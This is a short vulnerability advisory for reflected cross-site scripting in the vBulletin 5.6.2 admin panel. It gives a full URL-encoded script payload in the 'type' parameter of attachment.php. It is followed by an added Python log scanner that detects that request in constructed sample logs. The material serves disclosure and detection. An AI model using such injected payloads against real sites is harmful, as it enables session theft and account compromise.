# Exploit Title: vBulletin 5.6.2 Cross Site Scripting
# Date: 12.08.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://www.vbulletin.com/en/features/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Blog: https://pentest-vincent.blogspot.com/
# PoC: https://pentest-vincent.blogspot.com/2020/08/cross-site-scripting-in-vbulletin-ver.html

There is a cross-site scripting vulnerability in vBulletin 5.6.2.

PoC:

I use the demo admin panel for the test.

The vulnerable link:
https://6696f1715188-041313.demo.vbulletin.net/admincp/attachment.php&do=rebuild&type=[our xss is here]

Full link with code:
https://6696f1715188-041313.demo.vbulletin.net/admincp/attachment.php&do=rebuild&type=%22%22%3E%3Cscript%3Ealert(%22cross%20site%20scripting%20%22)%3C/script%3E

Picture: https://imgur.com/a/OicFHyA
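
A detection check for the request shown above, as an added example that is not part of the original advisory: it scans access-log lines for `admincp/attachment.php` requests whose `type` value decodes to HTML metacharacters. The log lines are constructed; the Combined Log Format layout and the benign `type=example` value are assumptions.

```python
import re
from urllib.parse import unquote

# Script path from the advisory. Its URL joins parameters with "&" straight
# after the script name (no "?"), so a query-string parser would see no
# parameters at all; match on the raw request target instead.
TARGET = "/admincp/attachment.php"
TYPE_PARAM = re.compile(r"[?&]type=([^&\s]*)", re.IGNORECASE)
MARKUP = re.compile(r"""[<>"']""")  # characters that can break out of HTML context
# Assumption: Combined Log Format request field, "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (addresses are documentation ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Aug/2020:10:00:00 +0000] "GET /admincp/attachment.php'
    '&do=rebuild&type=%22%22%3E%3Cscript%3Ealert(%22cross%20site%20scripting'
    '%20%22)%3C/script%3E HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Aug/2020:10:01:00 +0000] "GET /admincp/attachment.php'
    '?do=rebuild&type=example HTTP/1.1" 200 4980',
]

def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded values are normalised too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_type_value(target):
    """Return the decoded `type` value if it carries markup, else None."""
    if TARGET not in target.lower():
        return None
    m = TYPE_PARAM.search(target)
    if not m:
        return None
    value = decode_fully(m.group(1))
    return value if MARKUP.search(value) else None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        value = suspicious_type_value(m.group(1)) if m else None
        if value is not None:
            hits.append((n, value))
    return hits
```
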